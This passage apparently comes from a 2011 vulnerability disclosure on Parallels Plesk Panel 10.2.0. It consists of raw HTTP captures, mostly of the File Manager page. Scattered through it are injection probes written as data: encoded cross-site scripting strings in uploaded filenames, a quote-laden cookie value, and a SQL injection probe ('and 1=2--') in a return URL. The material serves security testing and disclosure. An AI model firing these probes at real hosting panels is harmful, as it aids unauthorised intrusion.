width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPGfdf080d921773c427dce8684" value="3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="return bin();;lon();">3M.COM-XSS-1.JPGfdf080d921773c427dce8684</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_673db%2522a%253d%2522b%25226c91d8a7d6d" value="673db%2522a%253d%2522b%25226c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick="return bin();;lon();">673db%2522a%253d%2522b%25226c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/673db%2522a%253d%2522b%25226c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /plesk/client@2/domain@1/hosting/file-manager/create-file/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard%2527%2527; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted;

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:36:30 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:36:32 GMT
Connection: close
Content-Length: 93592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%27%2520and%25201%253d2--%2520%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
